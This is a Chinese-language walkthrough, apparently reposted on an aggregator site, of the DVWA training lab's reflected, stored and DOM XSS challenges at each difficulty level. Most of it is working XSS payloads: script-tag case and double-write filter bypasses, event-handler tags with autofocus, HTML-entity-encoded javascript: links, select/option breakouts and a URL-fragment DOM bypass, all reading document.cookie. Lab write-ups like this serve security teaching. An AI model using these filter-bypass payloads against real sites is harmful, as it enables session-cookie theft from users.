web-xss-dvwa

这篇具有很好参考价值的文章主要介绍了web-xss-dvwa。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

xss(reflected)

low

medium

high

xss(store)

low

medium

high

xss(dom)

low

medium

 high


xss(reflected)

low

没有什么过滤,直接用最普通的标签就可以了

http://127.0.0.1/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E#

medium

大小写绕过

?name=<SCript>alert(document.cookie)<%2FSCript>

双写绕过

?name=<sc<script>ript>alert(document.cookie)<%2Fscript>

high

过滤规则:

$name = preg_replace( ‘/<(.)s(.)c(.)r(.)i(.)p(.)t/i’, ‘’, $_GET[ ‘name’ ] ); 对任何模式的script都过滤了。

①换标签进行过滤
 

知识点:

autofocus 属性是一个 boolean(布尔) 属性。

autofocus 属性规定当页面加载时按钮应当自动地获得焦点。

payload:

?name=<a href="x" onfocus="alert(document.cookie)"; autofocus="">xss</a>

web-xss-dvwa,web,xss,前端

②进行html编码

<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;">test</a>

gpt直接转就可以了

web-xss-dvwa,web,xss,前端

 

xss(store)

low

直接再内容框中输入基本的xss语言就可以了

<script>alert(document.cookie)</script>

medium

        先修改name的长度,让其写的下xss语句。再medium难度中,只能将代码写在name,写在内容里面是实现不了的

大小写绕过

<SCript>alert(document.cookie)</SCript>

双写绕过

<scr<script>ipt>alert(document.cookie)</script>

high

        先修改name的长度,让其写的下xss语句。再high难度中,只能将代码写在name,写在内容里面是实现不了的

web-xss-dvwa,web,xss,前端

high难度要换标签才能实现,script完全被过滤掉了

<a href="x" onclick=alert(document.cookie)>xss</a>

<img src="x" onclick=alert(document.cookie)>

xss(dom)

low

直接写上最普通的xss语句就可以了

?default=<script>alert(document.cookie)</scrip

medium

        select标签中只允许内嵌option标签,a、img标签嵌套再option标签中是无法实现器作用的。所以要先闭合option标签,然后再闭合select标签,这样子就可以了

?default="></option></select><a href="x" onclick=alert(1)>xss</a>

web-xss-dvwa,web,xss,前端

 high

源代码

        这里采用了白名单过滤的方法,只允许default值为 French English German Spanish 其中一个。

        代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。此时,在URL中添加注释#注释的内容不会提交到服务器,而是在浏览器执行

<?php
 
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
 
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
 
?> 

payload:文章来源地址https://www.toymoban.com/news/detail-646937.html

?default=English#<script>alert(document.cookie)</script>

到了这里,关于web-xss-dvwa的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(53)
  • web安全-dvwa搭建

    1,准备一台真实pc端或者在pc端安装虚拟机并准备一个系统 2,准备一个集成环境软件宝塔或者PHP study(小皮)等; 3,准备dvwa的软件包 新系统开机 拷贝需要的材料至pc并解压 3,安装集成环境软件(安装时安装路径不能包含中文或空格) 安装完成后打开软件;环境选择wnmp

    2024年02月05日
    浏览(45)
  • Kali搭建DVWA——Web靶场

    ▣ 博主主站地址:微笑涛声 【www.cztcms.cn】 1、DVWA简介 DVWA 是一款基于 PHP 和 MYSQL 开发的 web靶场 练习平台,集成了常见的web漏洞如 sql注入 , XSS , 密码破解 等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防

    2024年02月04日
    浏览(39)
  • Web安全测试(五):XSS攻击—存储式XSS漏洞

    结合内部资料,与安全渗透部门同事合力整理的安全测试相关资料教程,全方位涵盖电商、支付、金融、网络、数据库等领域的安全测试,覆盖Web、APP、中间件、内外网、Linux、Windows多个平台。学完后一定能成为安全大佬! 全部文章请访问专栏: 《全栈安全测试教程(0基础

    2024年02月10日
    浏览(72)
  • CTFshow web入门 web316-web333 XSS

    我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个 网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执

    2024年02月03日
    浏览(46)
  • web-xss

    目录 一、简介 二、xss的攻击方式 三、xss 常见标签语句 a标签 img标签 iframe标签 audio标签 video标签 svg标签 button标签 div标签 object标签 script标签 p标签 input标签 details标签 select标签 form标签 body标签 四、xss 常见绕过 编码绕过 1.html 实体编码 2. url 编码 3. js 编码(unicode编码) 4

    2024年02月13日
    浏览(25)
  • 【前端安全】-【防范xss攻击】

    XSS 攻击是页面被注入了恶意的代码 公司需要一个搜索页面,根据 URL 参数决定的内容。小明写的前端页面代码如下: 如果这个url是: http://xxx/search?keyword=\\\"scriptalert(\\\'XSS\\\');/script ,会导致页面弹出两次弹窗,因为当浏览器请求 http://xxx/search?keyword=\\\"scriptalert(\\\'XSS\\\');/script 时,

    2024年02月09日
    浏览(56)
  • 前端安全(XSS、CSRF)

    什么是xss攻击: XSS(跨站脚本攻击)是指攻击者通过注入恶意代码到 Web 页面中,从而达到攻击的目的。 XSS(跨站脚本攻击)是一种常见的 Web 攻击方式,攻击者通过在 Web 页面中注入恶意脚本,从而达到窃取用户信息、Cookie 和会话 ID、破坏网站基础设施等目的。 XSS 攻击一

    2024年02月11日
    浏览(42)
  • 前端安全XSS和CSRF讲解

    全称 Cross Site Scripting ,名为 跨站脚本攻击 。为啥不是单词第一个字母组合CSS,大概率与样式名称css进行区分。 XSS攻击原理 不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、html代码块等)。 导致的结

    2024年02月14日
    浏览(49)
  • Ctfshow web入门 XSS篇 web316-web333 详细题解 全

    是反射型 XSS 法一: 利用现成平台 法二: 自己搭服务器 先在服务器上面放一个接受Cookie的文件。 文件内容: payload: 已经获取到Cookie了 之后的题都用服务器不用XSS平台了。 管理服务器我用的是 xshell 和 xftp 。 和上一题一样的情景。 测试一下过滤了 script 了。 标签可以用

    2024年02月07日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包